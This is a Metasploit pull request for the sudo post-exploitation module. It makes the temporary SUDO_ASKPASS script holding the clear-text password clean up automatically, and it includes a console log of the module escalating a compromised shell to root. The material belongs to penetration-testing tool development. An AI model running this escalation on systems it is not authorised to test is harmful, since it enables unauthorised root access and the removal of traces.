### PR TITLE
Clean up the temperary script with the clear text password in it from sudo module

### DIFF
--- a/modules/post/multi/manage/sudo.rb
+++ b/modules/post/multi/manage/sudo.rb
@@ -7,6 +7,7 @@ class MetasploitModule < Msf::Post
   include Msf::Post::File
   include Msf::Post::Linux::Priv
   include Msf::Post::Linux::System
+  include Msf::Exploit::FileDropper
 
 
   def initialize(info={})
@@ -97,11 +98,14 @@ class MetasploitModule < Msf::Post
         # Generally will be much snappier over ssh.
         # Need to timeout in case there's a blocking prompt after all
         ::Timeout.timeout(120) do
+          # Create the shell script that will pass the password to sudo
           vprint_status "Writing the SUDO_ASKPASS script: #{askpass_sh}"
           write_file(askpass_sh, "#!/bin/sh\necho '#{password}'\n")
+          register_files_for_cleanup([askpass_sh])
           vprint_status "Setting executable bit."
           cmd_exec("chmod +x #{askpass_sh}")
           vprint_status "Setting environment variable."
+
           # Bruteforce the set command. At least one should work.
           cmd_exec("setenv SUDO_ASKPASS #{askpass_sh}")
           cmd_exec("export SUDO_ASKPASS=#{askpass_sh}")
@@ -113,18 +117,6 @@ class MetasploitModule < Msf::Post
       rescue
         print_error "SUDO: Sudo with a password failed. Check the session log."
       end
-      # askpass_cleanup(askpass_sh)
-    end
-  end
-
-  def askpass_cleanup(askpass_sh)
-    begin
-      ::Timeout.timeout(20) do
-        vprint_status "Deleting the SUDO_ASKPASS script."
-        cmd_exec("rm #{askpass_sh}")
-      end
-    rescue ::Timeout::Error
-      print_error "Timed out during sudo cleanup."
     end
   end
 end

--- a/modules/post/multi/manage/sudo.rb
+++ b/modules/post/multi/manage/sudo.rb
@@ -101,7 +101,7 @@ class MetasploitModule < Msf::Post
           # Create the shell script that will pass the password to sudo
           vprint_status "Writing the SUDO_ASKPASS script: #{askpass_sh}"
           write_file(askpass_sh, "#!/bin/sh\necho '#{password}'\n")
-          register_files_for_cleanup([askpass_sh])
+          register_file_for_cleanup(askpass_sh)
           vprint_status "Setting executable bit."
           cmd_exec("chmod +x #{askpass_sh}")
           vprint_status "Setting environment variable."


### PR DESCRIPTION
Fixes #13893

[\*] Command shell session 1 opened (192.168.14.98:1285 -> 192.168.14.11:50428) at 2020-07-25 08:44:34 -0600

msf5 exploit(multi/handler) > use post/multi/manage/sudo 
msf5 post(multi/manage/sudo) > set VERBOSE true
verbose => true
msf5 post(multi/manage/sudo) > set PASSWORD the$sign
password => the$sign
msf5 post(multi/manage/sudo) > set SESSION 1 
session => 1
msf5 post(multi/manage/sudo) > run

[\*] SUDO: Attempting to upgrade to UID 0 via sudo
[\*] Sudoing with password `the$sign'.
[\*] Writing the SUDO_ASKPASS script: /tmp/.ghIpLFa
[\*] Max line length is 4096
[\*] Writing 28 bytes in 1 chunks of 102 bytes (octal-encoded), using printf
[\*] Setting executable bit.
[\*] Setting environment variable.
[\*] Executing sudo -s -A
[+] SUDO: Root shell secured.
[\*] Post module execution completed
msf5 post(multi/manage/sudo) > sessions -i 1 
[\*] Starting interaction with 1...

id
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
cat /tmp/.ghIpLFa
cat: /tmp/.ghIpLFa: No such file or directory
ls -la /tmp/.ghIpLFa
ls: /tmp/.ghIpLFa: No such file or directory
